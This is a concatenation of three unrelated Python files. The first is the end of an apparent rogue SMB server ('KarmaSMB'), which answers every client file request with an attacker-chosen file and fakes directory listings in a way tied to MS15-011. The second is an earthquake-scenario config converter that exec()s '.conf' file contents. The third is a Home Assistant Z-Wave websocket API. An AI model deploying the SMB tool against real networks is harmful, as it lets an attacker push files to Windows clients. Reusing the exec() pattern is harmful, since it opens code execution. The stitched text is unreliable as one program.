connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
try:
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
except UnicodeDecodeError:
import sys
ntCreateRequest['Buffer'] = targetFile.decode(sys.getfilesystemencoding()).encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
# Windows clients with SMB2 will also perform a QueryDirectory
# expecting to get the filename asked. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
errorCode = 0xff
respSMBCommand['Buffer'] = '\x00'
errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
## Process here the request, does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | \
recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def _start(self):
self.server.serve_forever()
def run(self):
logging.info("Setting up SMB Server")
self._start()
def setDefaultFile(self, filename):
self.defaultFile = filename
def setExtensionsConfig(self, filename):
for line in filename.readlines():
line = line.strip('\r\n ')
if line.startswith('#') is not True and len(line) > 0:
extension, pathName = line.split('=')
self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = False, description = "For every file request received, this module will "
"return the pathname contents")
parser.add_argument("--help", action="help", help='show this help message and exit')
parser.add_argument('fileName', action='store', metavar = 'pathname', help="Pathname's contents to deliver to SMB "
"clients")
parser.add_argument('-config', type=argparse.FileType('r'), metavar = 'pathname', help='config file name to map '
'extensions to files to deliver. For those extensions not present, pathname will be delivered')
parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
try:
options = parser.parse_args()
except Exception, e:
logging.critical(str(e))
sys.exit(1)
s = KarmaSMBServer(options.smb2support)
s.setDefaultFile(os.path.normpath(options.fileName))
if options.config is not None:
s.setExtensionsConfig(options.config)
s.start()
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
sys.exit(1)
else:
pass
|
|
import json
import collections
import os
import argparse
import configparser
import ast
def _read_file(setup_file):
"""
Module for reading in scenario data file
"""
if not os.path.isfile(setup_file):
print("[ERROR] could not read file: {}".format(setup_file))
raise SystemExit()
file_name, file_ext = os.path.splitext(os.path.basename(setup_file))
if file_ext=='.conf':
discard = {}
setup = {}
exec (open(setup_file).read(), discard, setup)
elif file_ext=='.ini':
setup = configparser.ConfigParser()
setup.optionxform = str
setup.read(setup_file.decode('utf-8'))
return setup, file_ext
def convert_ini_object_to_json(setup):
data = collections.OrderedDict()
for section in setup.sections():
data[section] = collections.OrderedDict()
for param in setup[section].keys():
try:
data[section][param] = \
ast.literal_eval(setup.get(section, param))
except KeyError:
data[section][param] = None
json_data = json.dumps(data, indent=4, sort_keys=True)
return json_data
def convert_conf_object_to_json(setup):
data = collections.OrderedDict()
data['Scenario'] = collections.OrderedDict()
try:
data['Scenario']['SCENARIO_NAME'] = setup['SCENARIO_NAME']
except KeyError:
data['Scenario']['SCENARIO_NAME'] = None
try:
data['Scenario']['INTENSITY_MEASURE_PARAM']\
= setup['INTENSITY_MEASURE_PARAM']
except KeyError:
data['Scenario']['INTENSITY_MEASURE_PARAM'] = None
try:
data['Scenario']['INTENSITY_MEASURE_UNIT']\
= setup['INTENSITY_MEASURE_UNIT']
except KeyError:
data['Scenario']['INTENSITY_MEASURE_UNIT'] = None
try:
data['Scenario']['FOCAL_HAZARD_SCENARIOS']\
= setup['FOCAL_HAZARD_SCENARIOS']
except KeyError:
data['Scenario']['FOCAL_HAZARD_SCENARIOS'] = None
data['Hazard'] = collections.OrderedDict()
try:
data['Hazard']['HAZARD_INPUT_METHOD']\
= setup['HAZARD_INPUT_METHOD']
except KeyError:
data['Hazard']['HAZARD_INPUT_METHOD'] = None
try:
data['Hazard']['INTENSITY_MEASURE_MIN']\
= setup['INTENSITY_MEASURE_MIN']
except KeyError:
data['Hazard']['INTENSITY_MEASURE_MIN'] = None
try:
data['Hazard']['INTENSITY_MEASURE_MAX']\
= setup['INTENSITY_MEASURE_MAX']
except KeyError:
data['Hazard']['INTENSITY_MEASURE_MAX'] = None
try:
data['Hazard']['INTENSITY_MEASURE_STEP']\
= setup['INTENSITY_MEASURE_STEP']
except KeyError:
data['Hazard']['INTENSITY_MEASURE_STEP'] = None
try:
data['Hazard']['NUM_SAMPLES']\
= setup['NUM_SAMPLES']
except KeyError:
data['Hazard']['NUM_SAMPLES'] = None
#TODO read value from configure file at later stage
try:
data['Hazard']['HAZARD_TYPE'] = "earthquake"
except KeyError:
data['Hazard']['HAZARD_TYPE'] = None
# TODO read value from configure file at later stage
try:
data['Hazard']['HAZARD_RASTER'] = None
except KeyError:
data['Hazard']['HAZARD_RASTER'] = None
data['Restoration'] = collections.OrderedDict()
try:
data['Restoration']['TIME_UNIT'] = setup['TIME_UNIT']
except KeyError:
data['Restoration']['TIME_UNIT'] = None
try:
data['Restoration']['RESTORE_PCT_CHECKPOINTS']\
= setup['RESTORE_PCT_CHKPOINTS']
except KeyError:
data['Restoration']['RESTORE_PCT_CHECKPOINTS'] = None
try:
data['Restoration']['RESTORE_TIME_STEP']\
= setup['RESTORE_TIME_STEP']
except KeyError:
data['Restoration']['RESTORE_TIME_STEP'] = None
try:
data['Restoration']['RESTORE_TIME_MAX']\
= setup['RESTORE_TIME_MAX']
except KeyError:
data['Restoration']['RESTORE_TIME_MAX'] = None
try:
data['Restoration']['RESTORATION_STREAMS']\
= setup['RESTORATION_STREAMS']
except KeyError:
data['Restoration']['RESTORATION_STREAMS'] = None
data['System'] = collections.OrderedDict()
try:
data['System']['INFRASTRUCTURE_LEVEL']\
= setup['INFRASTRUCTURE_LEVEL']
except KeyError:
data['System']['INFRASTRUCTURE_LEVEL'] = None
try:
data['System']['SYSTEM_CLASSES']\
= setup['SYSTEM_CLASSES']
except KeyError:
data['System']['SYSTEM_CLASSES'] = None
try:
data['System']['SYSTEM_CLASS'] = setup['SYSTEM_CLASS']
except KeyError:
data['System']['SYSTEM_CLASS'] = None
try:
data['System']['SYSTEM_SUBCLASS'] = setup['SYSTEM_SUBCLASS']
except KeyError:
data['System']['SYSTEM_SUBCLASS'] = None
try:
data['System']['COMMODITY_FLOW_TYPES'] = setup['COMMODITY_FLOW_TYPES']
except KeyError:
data['System']['COMMODITY_FLOW_TYPES'] = None
try:
data['System']['SYS_CONF_FILE_NAME'] = setup['SYS_CONF_FILE_NAME']
except KeyError:
data['System']['SYS_CONF_FILE_NAME'] = None
data['SWITCHES'] = collections.OrderedDict()
try:
data['SWITCHES']['FIT_PE_DATA'] = setup['FIT_PE_DATA']
except KeyError:
data['SWITCHES']['FIT_PE_DATA'] = None
try:
data['SWITCHES']['SWITCH_FIT_RESTORATION_DATA'] = setup['SWITCH_FIT_RESTORATION_DATA']
except KeyError:
data['SWITCHES']['SWITCH_FIT_RESTORATION_DATA'] = None
try:
data['SWITCHES']['SWITCH_SAVE_VARS_NPY'] = setup['SWITCH_SAVE_VARS_NPY']
except KeyError:
data['SWITCHES']['SWITCH_SAVE_VARS_NPY'] = None
try:
data['SWITCHES']['MULTIPROCESS'] = setup['MULTIPROCESS']
except KeyError:
data['SWITCHES']['MULTIPROCESS'] = None
try:
data['SWITCHES']['RUN_CONTEXT'] = setup['RUN_CONTEXT']
except KeyError:
data['SWITCHES']['RUN_CONTEXT'] = None
json_data = json.dumps(data, indent=4, sort_keys=True)
return json_data
def convert_to_json(conf_file_path):
parent_folder_name = os.path.dirname(conf_file_path)
file_name = os.path.splitext(os.path.basename(conf_file_path))[0]
json_filename = os.path.join(parent_folder_name, file_name + '.json')
setup, file_type = _read_file(conf_file_path)
if file_type == '.conf':
json_data = convert_conf_object_to_json(setup)
elif file_type == '.ini':
json_data = convert_ini_object_to_json(setup)
else:
print("\n[ERROR] Incompatible file type for setup file.\n")
obj = open(json_filename, 'w')
obj.write(json_data)
obj.close()
json_filepath = os.path.abspath(json_filename)
return os.path.abspath(json_filepath)
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f", "--file", type=str,
help="Convert specified setup file from `conf` to json")
parser.add_argument(
"-a", "--all", action="store_true",
help="Covert all files under specified directory to json.")
args = parser.parse_args()
if args.file:
conf_file_path = args.file
convert_to_json(conf_file_path)
# ***********************************************
# The default location of simulation setup files:
par_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sim_setup_dir = os.path.join(par_dir, "simulation_setup")
# ***********************************************
if args.all:
conf_file_paths = []
for root, dir_names, file_names in os.walk(sim_setup_dir):
for file_name in file_names:
if file_name.endswith('.conf'):
if 'simulation_setup' in root:
conf_file_path = os.path.join(root, file_name)
conf_file_paths.append(conf_file_path)
for conf_file_path in conf_file_paths:
convert_to_json(conf_file_path)
if __name__ == "__main__":
main()
|
|
"""Web socket API for OpenZWave."""
from openzwavemqtt.const import (
ATTR_CODE_SLOT,
ATTR_LABEL,
ATTR_POSITION,
ATTR_VALUE,
EVENT_NODE_ADDED,
EVENT_NODE_CHANGED,
)
from openzwavemqtt.exceptions import NotFoundError, NotSupportedError
from openzwavemqtt.util.lock import clear_usercode, get_code_slots, set_usercode
from openzwavemqtt.util.node import (
get_config_parameters,
get_node_from_manager,
set_config_parameter,
)
import voluptuous as vol
import voluptuous_serialize
from homeassistant.components import websocket_api
from homeassistant.core import callback
from homeassistant.helpers import config_validation as cv
from .const import ATTR_CONFIG_PARAMETER, ATTR_CONFIG_VALUE, DOMAIN, MANAGER
from .lock import ATTR_USERCODE
DRY_RUN = "dry_run"
TYPE = "type"
ID = "id"
OZW_INSTANCE = "ozw_instance"
NODE_ID = "node_id"
PARAMETER = ATTR_CONFIG_PARAMETER
VALUE = ATTR_CONFIG_VALUE
SCHEMA = "schema"
ATTR_NODE_QUERY_STAGE = "node_query_stage"
ATTR_IS_ZWAVE_PLUS = "is_zwave_plus"
ATTR_IS_AWAKE = "is_awake"
ATTR_IS_FAILED = "is_failed"
ATTR_NODE_BAUD_RATE = "node_baud_rate"
ATTR_IS_BEAMING = "is_beaming"
ATTR_IS_FLIRS = "is_flirs"
ATTR_IS_ROUTING = "is_routing"
ATTR_IS_SECURITYV1 = "is_securityv1"
ATTR_NODE_BASIC_STRING = "node_basic_string"
ATTR_NODE_GENERIC_STRING = "node_generic_string"
ATTR_NODE_SPECIFIC_STRING = "node_specific_string"
ATTR_NODE_MANUFACTURER_NAME = "node_manufacturer_name"
ATTR_NODE_PRODUCT_NAME = "node_product_name"
ATTR_NEIGHBORS = "neighbors"
@callback
def async_register_api(hass):
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_get_instances)
websocket_api.async_register_command(hass, websocket_get_nodes)
websocket_api.async_register_command(hass, websocket_network_status)
websocket_api.async_register_command(hass, websocket_network_statistics)
websocket_api.async_register_command(hass, websocket_node_metadata)
websocket_api.async_register_command(hass, websocket_node_status)
websocket_api.async_register_command(hass, websocket_node_statistics)
websocket_api.async_register_command(hass, websocket_refresh_node_info)
websocket_api.async_register_command(hass, websocket_get_config_parameters)
websocket_api.async_register_command(hass, websocket_set_config_parameter)
websocket_api.async_register_command(hass, websocket_set_usercode)
websocket_api.async_register_command(hass, websocket_clear_usercode)
websocket_api.async_register_command(hass, websocket_get_code_slots)
def _call_util_function(hass, connection, msg, send_result, function, *args):
"""Call an openzwavemqtt.util function."""
try:
node = get_node_from_manager(
hass.data[DOMAIN][MANAGER], msg[OZW_INSTANCE], msg[NODE_ID]
)
except NotFoundError as err:
connection.send_error(
msg[ID],
websocket_api.const.ERR_NOT_FOUND,
err.args[0],
)
return
try:
payload = function(node, *args)
except NotFoundError as err:
connection.send_error(
msg[ID],
websocket_api.const.ERR_NOT_FOUND,
err.args[0],
)
return
except NotSupportedError as err:
connection.send_error(
msg[ID],
websocket_api.const.ERR_NOT_SUPPORTED,
err.args[0],
)
return
if send_result:
connection.send_result(
msg[ID],
payload,
)
return
connection.send_result(msg[ID])
def _get_config_params(node, *args):
raw_values = get_config_parameters(node)
config_params = []
for param in raw_values:
schema = {}
if param["type"] in ("Byte", "Int", "Short"):
schema = vol.Schema(
{
vol.Required(param["label"], default=param["value"]): vol.All(
vol.Coerce(int), vol.Range(min=param["min"], max=param["max"])
)
}
)
data = {param["label"]: param["value"]}
if param["type"] == "List":
for options in param["options"]:
if options["Label"] == param["value"]:
selected = options
break
schema = vol.Schema(
{
vol.Required(param["label"],): vol.In(
{
option["Value"]: option["Label"]
for option in param["options"]
}
)
}
)
data = {param["label"]: selected["Value"]}
config_params.append(
{
"type": param["type"],
"label": param["label"],
"parameter": param["parameter"],
"help": param["help"],
"value": param["value"],
"schema": voluptuous_serialize.convert(
schema, custom_serializer=cv.custom_serializer
),
"data": data,
}
)
return config_params
@websocket_api.websocket_command({vol.Required(TYPE): "ozw/get_instances"})
def websocket_get_instances(hass, connection, msg):
"""Get a list of OZW instances."""
manager = hass.data[DOMAIN][MANAGER]
instances = []
for instance in manager.collections["instance"]:
instances.append(dict(instance.get_status().data, ozw_instance=instance.id))
connection.send_result(
msg[ID],
instances,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/get_nodes",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_get_nodes(hass, connection, msg):
"""Get a list of nodes for an OZW instance."""
manager = hass.data[DOMAIN][MANAGER]
nodes = []
for node in manager.get_instance(msg[OZW_INSTANCE]).collections["node"]:
nodes.append(
{
ATTR_NODE_QUERY_STAGE: node.node_query_stage,
NODE_ID: node.node_id,
ATTR_IS_ZWAVE_PLUS: node.is_zwave_plus,
ATTR_IS_AWAKE: node.is_awake,
ATTR_IS_FAILED: node.is_failed,
ATTR_NODE_BAUD_RATE: node.node_baud_rate,
ATTR_IS_BEAMING: node.is_beaming,
ATTR_IS_FLIRS: node.is_flirs,
ATTR_IS_ROUTING: node.is_routing,
ATTR_IS_SECURITYV1: node.is_securityv1,
ATTR_NODE_BASIC_STRING: node.node_basic_string,
ATTR_NODE_GENERIC_STRING: node.node_generic_string,
ATTR_NODE_SPECIFIC_STRING: node.node_specific_string,
ATTR_NODE_MANUFACTURER_NAME: node.node_manufacturer_name,
ATTR_NODE_PRODUCT_NAME: node.node_product_name,
ATTR_NEIGHBORS: node.neighbors,
OZW_INSTANCE: msg[OZW_INSTANCE],
}
)
connection.send_result(
msg[ID],
nodes,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/set_usercode",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(ATTR_CODE_SLOT): vol.Coerce(int),
vol.Required(ATTR_USERCODE): cv.string,
}
)
def websocket_set_usercode(hass, connection, msg):
"""Set a usercode to a node code slot."""
_call_util_function(
hass, connection, msg, False, set_usercode, msg[ATTR_CODE_SLOT], ATTR_USERCODE
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/clear_usercode",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(ATTR_CODE_SLOT): vol.Coerce(int),
}
)
def websocket_clear_usercode(hass, connection, msg):
"""Clear a node code slot."""
_call_util_function(
hass, connection, msg, False, clear_usercode, msg[ATTR_CODE_SLOT]
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/get_code_slots",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_get_code_slots(hass, connection, msg):
"""Get status of node's code slots."""
_call_util_function(hass, connection, msg, True, get_code_slots)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/get_config_parameters",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_get_config_parameters(hass, connection, msg):
"""Get a list of configuration parameters for an OZW node instance."""
_call_util_function(hass, connection, msg, True, _get_config_params)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/set_config_parameter",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(PARAMETER): vol.Coerce(int),
vol.Required(VALUE): vol.Any(
vol.All(
cv.ensure_list,
[
vol.All(
{
vol.Exclusive(ATTR_LABEL, "bit"): cv.string,
vol.Exclusive(ATTR_POSITION, "bit"): vol.Coerce(int),
vol.Required(ATTR_VALUE): bool,
},
cv.has_at_least_one_key(ATTR_LABEL, ATTR_POSITION),
)
],
),
vol.Coerce(int),
bool,
cv.string,
),
}
)
def websocket_set_config_parameter(hass, connection, msg):
"""Set a config parameter to a node."""
_call_util_function(
hass, connection, msg, True, set_config_parameter, msg[PARAMETER], msg[VALUE]
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/network_status",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_network_status(hass, connection, msg):
"""Get Z-Wave network status."""
manager = hass.data[DOMAIN][MANAGER]
status = manager.get_instance(msg[OZW_INSTANCE]).get_status().data
connection.send_result(
msg[ID],
dict(status, ozw_instance=msg[OZW_INSTANCE]),
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/network_statistics",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_network_statistics(hass, connection, msg):
"""Get Z-Wave network statistics."""
manager = hass.data[DOMAIN][MANAGER]
statistics = manager.get_instance(msg[OZW_INSTANCE]).get_statistics().data
node_count = len(
manager.get_instance(msg[OZW_INSTANCE]).collections["node"].collection
)
connection.send_result(
msg[ID],
dict(statistics, ozw_instance=msg[OZW_INSTANCE], node_count=node_count),
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/node_status",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_node_status(hass, connection, msg):
"""Get the status for a Z-Wave node."""
try:
node = get_node_from_manager(
hass.data[DOMAIN][MANAGER], msg[OZW_INSTANCE], msg[NODE_ID]
)
except NotFoundError as err:
connection.send_error(
msg[ID],
websocket_api.const.ERR_NOT_FOUND,
err.args[0],
)
return
connection.send_result(
msg[ID],
{
ATTR_NODE_QUERY_STAGE: node.node_query_stage,
NODE_ID: node.node_id,
ATTR_IS_ZWAVE_PLUS: node.is_zwave_plus,
ATTR_IS_AWAKE: node.is_awake,
ATTR_IS_FAILED: node.is_failed,
ATTR_NODE_BAUD_RATE: node.node_baud_rate,
ATTR_IS_BEAMING: node.is_beaming,
ATTR_IS_FLIRS: node.is_flirs,
ATTR_IS_ROUTING: node.is_routing,
ATTR_IS_SECURITYV1: node.is_securityv1,
ATTR_NODE_BASIC_STRING: node.node_basic_string,
ATTR_NODE_GENERIC_STRING: node.node_generic_string,
ATTR_NODE_SPECIFIC_STRING: node.node_specific_string,
ATTR_NODE_MANUFACTURER_NAME: node.node_manufacturer_name,
ATTR_NODE_PRODUCT_NAME: node.node_product_name,
ATTR_NEIGHBORS: node.neighbors,
OZW_INSTANCE: msg[OZW_INSTANCE],
},
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/node_metadata",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_node_metadata(hass, connection, msg):
"""Get the metadata for a Z-Wave node."""
try:
node = get_node_from_manager(
hass.data[DOMAIN][MANAGER], msg[OZW_INSTANCE], msg[NODE_ID]
)
except NotFoundError as err:
connection.send_error(
msg[ID],
websocket_api.const.ERR_NOT_FOUND,
err.args[0],
)
return
connection.send_result(
msg[ID],
{
"metadata": node.meta_data,
NODE_ID: node.node_id,
OZW_INSTANCE: msg[OZW_INSTANCE],
},
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/node_statistics",
vol.Required(NODE_ID): vol.Coerce(int),
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
}
)
def websocket_node_statistics(hass, connection, msg):
"""Get the statistics for a Z-Wave node."""
manager = hass.data[DOMAIN][MANAGER]
stats = (
manager.get_instance(msg[OZW_INSTANCE]).get_node(msg[NODE_ID]).get_statistics()
)
connection.send_result(
msg[ID],
{
NODE_ID: msg[NODE_ID],
"send_count": stats.send_count,
"sent_failed": stats.sent_failed,
"retries": stats.retries,
"last_request_rtt": stats.last_request_rtt,
"last_response_rtt": stats.last_response_rtt,
"average_request_rtt": stats.average_request_rtt,
"average_response_rtt": stats.average_response_rtt,
"received_packets": stats.received_packets,
"received_dup_packets": stats.received_dup_packets,
"received_unsolicited": stats.received_unsolicited,
OZW_INSTANCE: msg[OZW_INSTANCE],
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "ozw/refresh_node_info",
vol.Optional(OZW_INSTANCE, default=1): vol.Coerce(int),
vol.Required(NODE_ID): vol.Coerce(int),
}
)
def websocket_refresh_node_info(hass, connection, msg):
"""Tell OpenZWave to re-interview a node."""
manager = hass.data[DOMAIN][MANAGER]
options = manager.options
@callback
def forward_node(node):
"""Forward node events to websocket."""
if node.node_id != msg[NODE_ID]:
return
forward_data = {
"type": "node_updated",
ATTR_NODE_QUERY_STAGE: node.node_query_stage,
}
connection.send_message(websocket_api.event_message(msg["id"], forward_data))
@callback
def async_cleanup() -> None:
"""Remove signal listeners."""
for unsub in unsubs:
unsub()
connection.subscriptions[msg["id"]] = async_cleanup
unsubs = [
options.listen(EVENT_NODE_CHANGED, forward_node),
options.listen(EVENT_NODE_ADDED, forward_node),
]
instance = manager.get_instance(msg[OZW_INSTANCE])
instance.refresh_node(msg[NODE_ID])
connection.send_result(msg["id"])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.